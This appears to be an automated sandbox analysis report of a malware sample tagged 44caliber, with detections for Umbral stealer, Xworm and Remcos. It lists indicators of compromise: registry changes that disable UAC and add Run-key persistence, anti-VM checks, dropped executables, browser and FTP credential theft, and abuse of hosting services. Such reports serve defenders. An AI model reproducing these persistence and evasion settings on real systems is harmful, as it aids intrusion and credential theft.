44caliber | cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3EUEYgl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9feskIx.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4XYFk9r.exe

Adds policy Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	RMX.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	RMX.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	remcos.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	remcos.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
199	3164	rundll32.exe
200	3164	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3180	powershell.exe
4036	powershell.exe
940	powershell.exe
3708	powershell.exe
7152	powershell.exe
6436	powershell.exe
3420	powershell.exe
2612	powershell.exe
7420	powershell.exe
6732	powershell.exe
2920	powershell.EXE
6308	powershell.exe
4296	powershell.exe
2792	powershell.EXE

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3EUEYgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3EUEYgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9feskIx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9feskIx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4XYFk9r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4XYFk9r.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Dynpvoy.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	bbvlnu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	C1J7SVw.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	3EUEYgl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	4XYFk9r.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	chrome11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RMX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	9feskIx.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe	l4.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe	l4.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe	cmd.exe

Executes dropped EXE 53 IoCs

pid	Process
2648	random.exe
4560	client.exe
5008	7z.exe
4868	7z.exe
992	7z.exe
3044	7z.exe
3908	7z.exe
2544	7z.exe
5068	7z.exe
4712	7z.exe
872	in.exe
1664	l4.exe
1356	l4.exe
4820	W4KLQf7.exe
3044	yiklfON.exe
3976	AzVRM7c.exe
960	Z9Pp9pM.exe
5108	graph.exe
4732	C1J7SVw.exe
4656	3EUEYgl.exe
2216	Dynpvoy.exe
5496	M5iFR20.exe
5372	networkmanager.exe
6072	9feskIx.exe
1896	4XYFk9r.exe
5152	7z.exe
4564	dwVrTdy.exe
728	RMX.exe
5644	7z.exe
2356	7z.exe
3188	7z.exe
1800	yiklfON.exe
5104	remcos.exe
1620	7z.exe
2824	7z.exe
3772	7z.exe
3156	7z.exe
1532	in.exe
2984	graph.exe
4668	chrome11.exe
5640	alexshlu.exe
3508	alexshlu.exe
3700	Dynpvoy.exe
1896	Gxtuum.exe
2396	Intel_PTT_EK_Recertification.exe
2824	t5abhIx.exe
5768	graph.exe
2152	888.exe
5280	Gxtuum.exe
6008	bbvlnu.exe
5200	puttyw.exe
4372	50to.exe
5272	aysnfp.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	9feskIx.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	4XYFk9r.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	3EUEYgl.exe

Loads dropped DLL 24 IoCs

pid	Process
5008	7z.exe
4868	7z.exe
992	7z.exe
3044	7z.exe
3908	7z.exe
2544	7z.exe
5068	7z.exe
4712	7z.exe
1356	l4.exe
1356	l4.exe
1356	l4.exe
1356	l4.exe
1356	l4.exe
1356	l4.exe
1896	4XYFk9r.exe
5152	7z.exe
5644	7z.exe
2356	7z.exe
3188	7z.exe
1620	7z.exe
2824	7z.exe
3772	7z.exe
3156	7z.exe
3164	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe"	AzVRM7c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe"	networkmanager.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	RMX.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	RMX.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	remcos.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe"	dwVrTdy.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe"	t5abhIx.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs

Web Service

T1102

flow	ioc
19	raw.githubusercontent.com
20	raw.githubusercontent.com
27	discord.com
30	discord.com
33	discord.com
47	drive.google.com
48	drive.google.com
115	raw.githubusercontent.com
120	drive.google.com
178	drive.google.com
225	raw.githubusercontent.com
275	pastebin.com
274	pastebin.com

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
180	ipinfo.io
181	ipinfo.io
239	ip-api.com
269	ip-api.com
117	ip-api.com
61	ipinfo.io
134	ipinfo.io
135	ipinfo.io
231	freegeoip.app
60	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral6/files/0x0007000000023cf8-867.dat	autoit_exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock	lsass.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp	lsass.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp	lsass.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs	dllhost.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp	lsass.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp	lsass.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus	dllhost.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
6040	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4656	3EUEYgl.exe
6072	9feskIx.exe
1896	4XYFk9r.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3044 set thread context of 1800	3044	yiklfON.exe	161
PID 5104 set thread context of 4260	5104	remcos.exe	164
PID 5640 set thread context of 3508	5640	alexshlu.exe	211
PID 2216 set thread context of 3700	2216	Dynpvoy.exe	213
PID 2396 set thread context of 6048	2396	Intel_PTT_EK_Recertification.exe	217
PID 1896 set thread context of 5280	1896	Gxtuum.exe	227
PID 2792 set thread context of 3112	2792	powershell.EXE	237
PID 676 set thread context of 4588	676	lsass.exe	238

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral6/memory/872-108-0x00007FF6381F0000-0x00007FF638680000-memory.dmp	upx
behavioral6/files/0x0008000000023cbc-110.dat	upx
behavioral6/files/0x0007000000023cfb-1486.dat	upx
behavioral6/memory/5372-1488-0x0000000000990000-0x000000000110B000-memory.dmp	upx
behavioral6/memory/5372-1527-0x0000000000990000-0x000000000110B000-memory.dmp	upx
behavioral6/memory/1532-1652-0x00007FF7AC980000-0x00007FF7ACE10000-memory.dmp	upx
behavioral6/memory/1532-1650-0x00007FF7AC980000-0x00007FF7ACE10000-memory.dmp	upx
behavioral6/memory/2396-2956-0x00007FF765AD0000-0x00007FF765F60000-memory.dmp	upx
behavioral6/memory/2396-2967-0x00007FF765AD0000-0x00007FF765F60000-memory.dmp	upx
behavioral6/files/0x0004000000000739-5452.dat	upx
behavioral6/memory/5624-5471-0x0000000000400000-0x000000000197D000-memory.dmp	upx
behavioral6/memory/5624-5698-0x0000000000400000-0x000000000197D000-memory.dmp	upx
behavioral6/memory/3672-6682-0x00007FF765AD0000-0x00007FF765F60000-memory.dmp	upx

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Media Player\graph	dwVrTdy.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	dwVrTdy.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	dwVrTdy.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	dwVrTdy.exe
File created	C:\Program Files\Google\Chrome\Application\chrome.exe	chrome11.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome.exe	chrome11.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	t5abhIx.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	AzVRM7c.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	dwVrTdy.exe
File opened for modification	C:\Program Files\Windows Media Player\graph\graph.exe	t5abhIx.exe
File opened for modification	C:\Program Files\Windows Media Player\graph\graph.exe	dwVrTdy.exe
File opened for modification	C:\Program Files\Windows Media Player\graph	t5abhIx.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	t5abhIx.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	AzVRM7c.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	AzVRM7c.exe
File created	C:\Program Files\Windows Media Player\graph\graph.exe	AzVRM7c.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	AzVRM7c.exe
File created	C:\Program Files\Windows Media Player\graph\graph.exe	dwVrTdy.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	t5abhIx.exe
File created	C:\Program Files\Windows Media Player\graph\graph.exe	t5abhIx.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	t5abhIx.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Gxtuum.job	Dynpvoy.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral6/files/0x0003000000000747-4551.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
7840	msiexec.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
5860	1800	WerFault.exe	161
5296	7332	WerFault.exe	290
5664	2348	WerFault.exe	273

System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	M5iFR20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4XYFk9r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	W4KLQf7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3EUEYgl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alexshlu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	888.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yiklfON.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Z9Pp9pM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dynpvoy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C1J7SVw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9feskIx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	remcos.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alexshlu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yiklfON.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	50to.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	puttyw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dynpvoy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RMX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4368	PING.EXE
3972	powershell.exe
5696	PING.EXE
6024	powershell.exe
3844	PING.EXE
7016	powershell.exe
1104	powershell.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3EUEYgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3EUEYgl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	4XYFk9r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	4XYFk9r.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
5172	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
4500	systeminfo.exe
2356	systeminfo.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	87	Go-http-client/1.1

Kills process with taskkill 1 IoCs

pid	Process
2984	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	dllhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RMX.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

pid	Process
2196	reg.exe
2892	reg.exe

Runs .reg file with regedit 1 IoCs

pid	Process
4044	regedit.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4368	PING.EXE
5696	PING.EXE
3844	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4656	schtasks.exe
3200	schtasks.exe
6284	schtasks.exe
7872	schtasks.exe
7048	schtasks.exe
7524	schtasks.exe
7136	schtasks.exe
6184	schtasks.exe
4616	schtasks.exe
6232	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

